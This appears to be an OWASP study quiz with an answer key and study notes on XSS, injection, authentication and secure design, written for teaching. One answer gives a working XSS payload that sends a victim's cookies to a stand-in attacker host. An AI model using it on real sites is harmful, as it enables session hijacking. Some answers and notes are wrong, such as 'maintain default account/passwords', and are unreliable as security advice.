OWASP Overview and Core Values

Questions and Answers

What should be ensured when storing sensitive data?

Use weak algorithms to increase processing speed.

Ensure that the cryptographic protection remains secure even if access controls fail. (correct)

Only store sensitive data that is outdated.

Sensitive data should be encrypted with any method available.

Which of the following practices supports good cryptographic storage design?

Storing plain text passwords for easy access.

Using strong approved Authenticated Encryption. (correct)

Keeping cryptographic keys publicly accessible.

Avoiding regulations on the use of cryptography.

What is a common issue related to insecure dependencies?

Using software that is vulnerable, unsupported, or out of date. (correct)

Knowing the version of dependencies accurately.

Monitoring component configuration regularly.

Regularly patching outdated software components.

Which action contributes to preventing issues related to dependencies?

Continuously monitoring for vulnerabilities.

What is an ineffective approach to securing software components?

Patch management processes are insufficient or missing.

What is the primary approach of Allow List Input Validation?

Block all user inputs unless explicitly allowed

Which of the following is an example of a situation where Client Side Validation can be bypassed?

By editing headers and data in a browser's developer tools

What is a major drawback of using Block List Input Validation?

It must be regularly updated to address new attack patterns

What does injection in the context of application security refer to?

Executing unintended commands in an application

Which statement best describes the nature of Allow List Input Validation?

It is less effective over time if not maintained

How should an HTML sanitizer be utilized when handling user input?

By sanitizing larger HTML chunks provided by the user

What is a common method attackers use to exploit broken access control?

Changing the primary key to another user's record

Which type of privilege escalation involves accessing another user's data at the same level?

Horizontal Privilege Escalation

What is a significant characteristic of negative security rules in input validation?

Require a comprehensive understanding of potential attacks

Which of the following is a recommended prevention measure for access control issues?

Deny access to private resources by default

Which of the following is NOT a potential interpreter type where injection can occur?

Excel

What should access tokens do upon user logout to enhance security?

Be invalidated on the server

What is an effective way to enforce access control mechanisms within an application?

Reuse access control mechanisms throughout the application

Which of the following describes the practice of force browsing?

Attempting to view authenticated pages as an anonymous user

What is a key reason to log access control failures?

To alert administrators when appropriate

What does the principle of Defense in Depth primarily emphasize?

Implementing multiple barriers to manage risks

What is the recommended outcome when a transaction fails?

Fail closed to prevent unauthorized access

Which of the following is NOT a common attack related to broken access control?

Data encryption attacks

Why should external systems be treated with caution?

They might vary in security posture and policies

What role does Separation of Duties play in security?

It prevents fraud by clearly dividing responsibilities

What criticism is associated with Security by Obscurity?

It relies solely on keeping security details hidden

What is a key advantage of keeping security simple?

It reduces the attack surface and improves efficiency

What should be avoided when developing secure systems?

Incorporating complex architectures unnecessarily

What does failing securely prevent?

Unauthorised access during a failure

What is a primary characteristic of Reflected XSS?

User input is included in HTML output without validation.

Which of the following examples demonstrates a successful payload for stealing user sessions in an XSS attack?

new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie);

What is the main risk associated with Stored XSS vulnerabilities?

They can impact multiple users who access stored input.

In the context of XSS, what does DOM XSS primarily involve?

JavaScript frameworks dynamically incorporating problematic data.

What is a common method used in an XSS redirect attack?

Changing the window location with JavaScript.

Which link is an indication of a possible phishing attempt in the lottery scenario?

http://ev.il/hijack.php

What is the aim of the 'document.body.background' payload in an XSS attack?

To change the background of the webpage to a malicious image.

What generally happens when a user inputs data in an unsafe manner within a search field?

Potentially dangerous scripts may be executed.

What is the primary mission of OWASP?

To improve the security of software

Which of the following is NOT listed as a core value of OWASP?

Security Innovation

Which XSS vulnerability allows an attacker to send a malicious script to a user?

Cross-Site Scripting (XSS)

What are typical impacts of XSS attacks?

Steal a user's session

What is a critical root cause of XSS vulnerabilities?

Including untrusted data into dynamic content without validation

Which component is NOT part of the OWASP Top 10 list?

Cross-Origin Resource Sharing

What principle does OWASP uphold regarding community participation?

Global participation is encouraged

How does a user's browser wrongly trust the malicious script in an XSS attack?

The script comes from a trusted source

Which action is a common characteristic of XSS attacks?

Redirecting users to malicious websites

What does OWASP's commitment to openness entail?

All finances and code are transparently shared

Study Notes

OWASP (Open Web Application Security Project)

• OWASP is a non-profit foundation dedicated to improving software security
• It utilizes a community-driven approach with open-source projects
• The foundation offers numerous local chapters worldwide
• OWASP boasts tens of thousands of members
• It is a leading source of educational and training resources for developers and technologists to secure web applications

Core Values

• Open: Transparency in finances and code is paramount
• Innovative: Encourages exploration of new solutions for software security challenges
• Global: Welcomes participation from anywhere in the world
• Integrity: Fosters a respectful, supportive, truthful, and vendor-neutral community

OWASP Top 10

• This is a prioritized list of the most critical web application security risks
• The list is regularly updated to reflect emerging threats
• The OWASP Top 10 serves as a guide for developers to strengthen their applications against common vulnerabilities

Cross-Site Scripting (XSS)

• Attackers can inject malicious scripts into a web application
• The user's browser executes the malicious script, thinking it originates from a trusted source
• Attackers can steal user sessions, sensitive data, and rewrite HTML pages
• Vulnerabilities arise when untrusted data is included in dynamic content without validation

Root Cause of XSS

• Applications often incorporate untrusted data from HTTP requests into dynamic content
• Failure to validate this data for malicious content creates the vulnerability

Typical XSS Impacts

• Stealing user sessions
• Accessing sensitive data
• Manipulating web page content
• Redirecting users to malicious websites

XSS Exploit Example

• A web application's search field accepts input without validation
• An attacker can enter malicious HTML code (e.g., an image tag with a malicious URL)
• The application displays the attacker's code, executing it in the victim's browser

XSS Payload Examples

• Stealing user sessions
• Site defacing
• Redirecting users

Forms of XSS

• Reflected XSS: Includes unvalidated user input in HTML output
• Stored XSS: Stores unsanitized user input, which other users see later
• DOM (Document Object Model) XSS: Executes attacker-controlled data inserted in frameworks

XSS Prevention

• Do not include user-supplied input directly in your output
• Encode all user-supplied input
• Use input validation (allow-listing) to specify acceptable input
• Use HTML sanitizers for complex user input

Input Validation - Block List

• This method blocks specific input characters or patterns
• Drawback: Vulnerable to masking techniques

Input Validation - Allow List

• Only allows specific characters or patterns
• Advantage: Protects against future vulnerabilities
• Disadvantage: Defining the acceptable input characters can be complex

Bypassing Client-Side Validation

• Client-side validation is for convenience, not security
• It can be easily bypassed by directly interacting with the back-end

Injection (Example: SQL Injection)

• Tricking an application into including unintended commands in data sent to an interpreter
• Interpreters Affected: Query languages (SQL, NoSQL, HQL, LDAP, XPath), Expression languages (SpEL, JSP/JSF EL), Template engines (Freemarker, Velocity), Command-line interfaces (Bash, PowerShell)

SQL Injection - Typical Impact

• Bypassing authentication
• Spying out data
• Manipulating data
• Complete system takeover

Blind SQL Injection

• Attackers don't get direct error messages
• They use boolean conditions to deduce if the query succeeds or fails
• This process takes time to complete and can be slow

Prevention for SQL Injection

• Avoid constructing SQL statements with string manipulation
• Utilize prepared statements, parameters, or parameterized queries
• Use an interface to avoid interpreters

Prevention (Other)

• Missing appropriate security hardening across application stack: Install the latest versions of application components, properly configure and secure permissions in the cloud services, disable unnecessary features, and ensure default accounts/passwords have been disabled

Typical Flaws in Authentication

• Allowing brute-force attacks
• Implementing weak password recovery processes
• Using unsecure password storage methods (e.g., plain text, weak hashing)
• Forgetting multi-factor authentication
• Exposing session IDs in the URL

Password Strength Controls

• Enforce minimum password length, avoiding periodic password resets
• Ban commonly breached passwords
• Offer password visibility or clipboard pasting options

Secure "Forgot Password" Mechanism

• Provide uniform messages for both existing and non-existent accounts
• Use a side channel (e.g., phone call, email address) for password reset instructions
• Utilize URL tokens for password reset

Secure Password Storage

• Use bcrypt (or equivalent) password hashing algorithms
• Set a reasonable work factor (e.g., prevent brute-force cracking)
• Use a salt (modern algorithms use automatic salts)
• Consider using a pepper (for enhanced security, but less common)

Other Authentication Controls

• Use TLS (secure communication protocol)
• Implement strategies such as throttling for brute-force prevention
• Require re-authentication for sensitive features
• Offer two-factor or multi-factor authentication

Two-Factor Authentication (2FA)

• Requires two out of three types of credentials (Something you know, Something you have, Something you are)

Broken Access Control

• Applications incorrectly handling user permissions expose unauthorized functionality.
• Possible Impacts: Unauthorized access, view sensitive files, modify data, change access rights, and other privileged actions.

Access Control Design Principles

• Thoroughly design access controls up front
• Enforce access checks for all requests
• Deny access by default (unless explicitly granted access)
• Enforce principle of least privilege
• Avoid hardcoding roles
• Log all access control events

Sensitive Data

• Data like passwords, credit card numbers, personally identifiable information (PII), and business secrets warrants special protection.
• Following data protection regulations (e.g., GDPR, PCI DSS) is crucial

GDPR (General Data Protection Regulation)

• A comprehensive data privacy regulation in the EU
• Addresses the protection of personal data and the data processing

Secure Cryptographic Storage Design

• Store sensitive data only when needed, using strong encryption and salt
• Ensure cryptographic protection even under compromised access controls
• Protect secret keys from unauthorized access, following appropriate regulations for cryptography

Insecure Dependencies

• Applications using vulnerable, outdated, or unmaintained dependencies increase attack surface
• Use scanners and continuously monitor versions for known vulnerabilities and security bulletins

Insecure Configuration

• Employ appropriate server hardening measures
• Properly configure permissions and disable unused/unnecessary components
• Maintain default account/passwords

Secure Design Principles

• Minimize attack surface area
• Enforce strong default security configurations for new application features
• Provide least privilege access to users
• Employ in-depth security measures
• Ensure secure failure states when transactions/code execution fail

Don't Trust Services

• External services should not be trusted implicitly
• Treat all external services as potentially hostile entities

Separation of Duties

• Implementing a separation of duties framework for application administrators
• Prevents single points of failure

Avoid Security by Obscurity

• Hiding sensitive information or functionalities should never be the sole security measure
• Implementing other security strategies is always beneficial to maintain security

Keep Security Simple

• Maintain an uncomplicated and straightforward design.
• Prioritize clean code over intricate, complex approaches.
• Avoid complex designs or double negatives where simpler approaches are available.

Description

Explore the Open Web Application Security Project (OWASP), a non-profit foundation dedicated to enhancing software security through community-driven initiatives. Learn about its core values, the significance of the OWASP Top 10, and how this organization empowers developers to address web application security risks effectively.